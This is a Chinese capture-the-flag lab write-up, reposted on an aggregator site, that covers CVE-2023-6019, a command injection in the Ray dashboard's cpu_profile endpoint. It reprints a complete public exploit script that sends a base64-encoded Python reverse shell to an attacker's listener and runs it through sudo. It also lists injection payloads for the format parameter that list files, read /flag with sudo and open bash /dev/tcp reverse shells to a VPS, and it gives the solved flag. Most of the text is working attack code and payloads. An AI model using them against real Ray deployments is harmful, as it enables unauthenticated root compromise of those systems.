欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 房产 > 家装 > 春秋云镜-CVE-2023-6019

春秋云镜-CVE-2023-6019

2024/10/25 11:27:12 来源:https://blog.csdn.net/m0_61155226/article/details/141687299  浏览:    关键词:春秋云镜-CVE-2023-6019

 

 

4bee16c403794be58bfde4e6bf4262c1.png靶标介绍:

        Ray的`cpu_profile` URL参数存在命令注入漏洞,允许攻击者在未经身份验证的情况下远程在运行Ray仪表板的系统上执行操作系统命令。

公开POC参考:Ray OS v2.6.3 - Command Injection RCE(Unauthorized) - Python webapps Exploit

# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is
#  not validated before being inserted into a system command executed in a shell, allowing
#  for arbitrary command execution. If the system is configured to allow passwordless sudo
#  (a setup some Ray configurations require) this will result in a root shell being returned
#  to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3proxies = {"http": "127.0.0.1:8080"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}def check_url(target, port):target_url = target + ":" + porthttps = 0if 'http' not in target:try:urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)test_url = 'http://' + target_urlresponse = requests.get(url=test_url, headers=headers, verify=False, timeout=3)if response.status_code != 200:is_https = 0return is_httpsexcept Exception as e:print("ERROR! The Exception is:" + format(e))if https == 1:return "https://" + target_urlelse:return "http://" + target_urldef exp(target,ip,lhost, lport):payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''print("[*]Payload is: " + payload)b64_payload = base64.b64encode(payload.encode())print("[*]Base64 encoding payload is: " + b64_payload.decode())exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'# response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)print(exp_url)urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)response = requests.get(url=exp_url, headers=headers, verify=False)if response.status_code == 200:print("[-]ERROR: Exploit Failed,please check the payload.")else:print("[+]Exploit is finished,please check your machine!")if __name__ == '__main__':parser = argparse.ArgumentParser(description='''⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄''',formatter_class=argparse.RawDescriptionHelpFormatter,)parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')args = parser.parse_args()# target = args.targetip = args.target# port = args.port# lhost = args.lhost# lport = args.lporttargeturl = check_url(args.target, args.port)print(targeturl)print("[*] Checking in url: " + targeturl)exp(targeturl, ip, args.lhost, args.lport)

根据公开的POC进行分析,可以得出漏洞存在的位置是:Jobs ->CPU Flame Graph (Driver)

fd4d1b30f09540d584678017259a0e28.png

我们点击访问后,跳转页面如下:

65033ae2ef3042e38f4f30589916424f.png

此时我们可以通过构造format参数,控制程序执行的命令:

sudo -n $(which py-spy) record -o /tmp/ray/session_2024-08-29_03-59-48_537905_11/logs/flamegraph_11_cpu_profiling.svg -p 11 -d 5 -f flamegraph

我的构造如下:

format=;ls -all /;2>/dev/null;2

此时程序执行的命令为:

sudo -n $(which py-spy) record -o /tmp/ray/session_2024-08-29_03-59-48_537905_11/logs/;ls -all /;2>/dev/null;2_11_cpu_profiling.txt -p 11 -d 5 -f ;ls -all /;2>/dev/null;2

706c6b8c8961412eb22e5ab51cc0ef29.png

尝试构造读取Flag:

format=;sudo cat /flag;2>/dev/null;2

99ced4ad507645c08b4c1d12a3f0cdf0.png

flag{e0488eb2-f9d7-4856-937c-e18b2e14a7d3}

88f7593cb2a6432f8fa6dce8ea0232f3.jpg

 

补充:也可以反弹Shell到VPS

format=xxx;bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1';11
format=xxx;bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F[IP]%2F[PORT]%200%3E%261';11

b518e64935d640d797080bcc679cd970.png

 

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

camunda7动态添加监听器 HbuilderX 连接 Genymotion 模拟器 牛逼了!教你如何使用Pytest测试框架开展性能基准测试! 项目模块六:EventLoop模块 有趣的css - 多重阴影按钮 关闭钉钉AI助理